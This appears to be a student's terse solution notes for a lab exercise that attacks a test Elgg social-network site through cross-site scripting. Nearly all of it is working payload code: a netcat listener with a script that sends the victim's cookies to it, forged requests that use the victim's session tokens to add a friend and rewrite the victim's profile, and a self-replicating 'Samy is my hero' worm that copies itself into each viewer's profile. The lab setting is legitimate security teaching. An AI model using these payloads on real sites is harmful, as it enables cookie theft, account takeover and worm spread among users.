## Task 3
```bash
$ nc -lv 5500
```

change profile to by edit html
```
<script>document.write('<img src=http://127.0.0.1:5500?c='
		+ escape(document.cookie) + ' >');
</script>
```

## task 4

```
<script type="text/javascript">
window.onload = function()
{
	var Ajax = null;

    var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
	var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
	    
	var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=47" + ts +token
			  
	Ajax = new XMLHttpRequest();
	Ajax.open("GET", sendurl, true);
	Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
	Ajax.send();
}

</script>
```

## task 5

```
<script type="text/javascript">
window.onload = function()
{
	var guid      = "&guid="             + elgg.session.user.guid;
	var ts        = "&__elgg_ts="        + elgg.security.token.__elgg_ts;
	var token     = "&__elgg_token="     + elgg.security.token.__elgg_token;
	var name      = "&name="             + elgg.session.user.name;
	var desc      = "&description=Samy is my hero" + 
		            "&accesslevel[description]=2";

	var sendurl   = "http://www.xsslabelgg.com/action/profile/edit";
	var content   = guid + token + ts + name + desc;
	if (elgg.session.user.guid != 47)
	{
		var Ajax = null;
		Ajax = new XMLHttpRequest();
		Ajax.open("POST", sendurl, true);
		Ajax.setRequestHeader("Content-Type",
				               "application/x-www-form-urlencoded");
		Ajax.send(content);
	}
}
</script>
```

## task 6

```
<script type="text/javascript" id="worm">
window.onload = function()
{
	var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
	var jsCode = document.getElementById("worm").innerHTML;
	var tailTag = "</" + "script>";

	var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

	var desc = "&description=Samy is my hero" + wormCode;
	desc += "&accesslevel[description]=2";

	var name = "&name=" + elgg.session.user.name;
	var guid = "&guid=" + elgg.session.user.guid;
	var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
	var token = "&__elgg_token=" + elgg.security.token.__elgg_token;

	var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	var content = token + ts + guid + desc + name;

	if (elgg.session.user.guid != 47)
	{
		var Ajax = null;
		Ajax = new XMLHttpRequest();
		Ajax.open("POST", sendurl, true);
		Ajax.setRequestHeader("Content-Type",
				              "application/x-www-form-urlencoded");
		Ajax.send(content);
	}
}
</script>
```
